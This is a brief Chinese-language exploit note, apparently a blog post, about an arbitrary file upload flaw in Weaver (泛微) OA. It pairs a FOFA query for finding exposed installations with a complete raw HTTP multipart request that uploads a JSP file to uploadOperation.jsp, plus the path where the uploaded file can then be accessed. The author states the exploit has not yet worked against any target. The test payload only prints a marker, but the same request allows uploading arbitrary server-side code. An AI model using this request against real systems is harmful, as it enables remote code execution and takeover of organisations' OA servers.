0x00 简介
0x01 fofa语法
fofa app=”Weaver-OA”
0x02 漏洞利用
POST /page/exportImport/uploadOperation.jsp HTTP/1.1Host: x.x.x.xContent-Length: 216Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://x.x.x.x/Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwoConnection: close------WebKitFormBoundaryFy3iNVBftjP6IOwoContent-Disposition: form-data; name="file"; filename="12.jsp"Content-Type: application/octet-stream<%out.print(1111);%>------WebKitFormBoundaryFy3iNVBftjP6IOwo--
然后访问page/exportImport/fileTransfer/12.jsp
0x03 总结
还没成功利用过,没找到存在该漏洞的目标
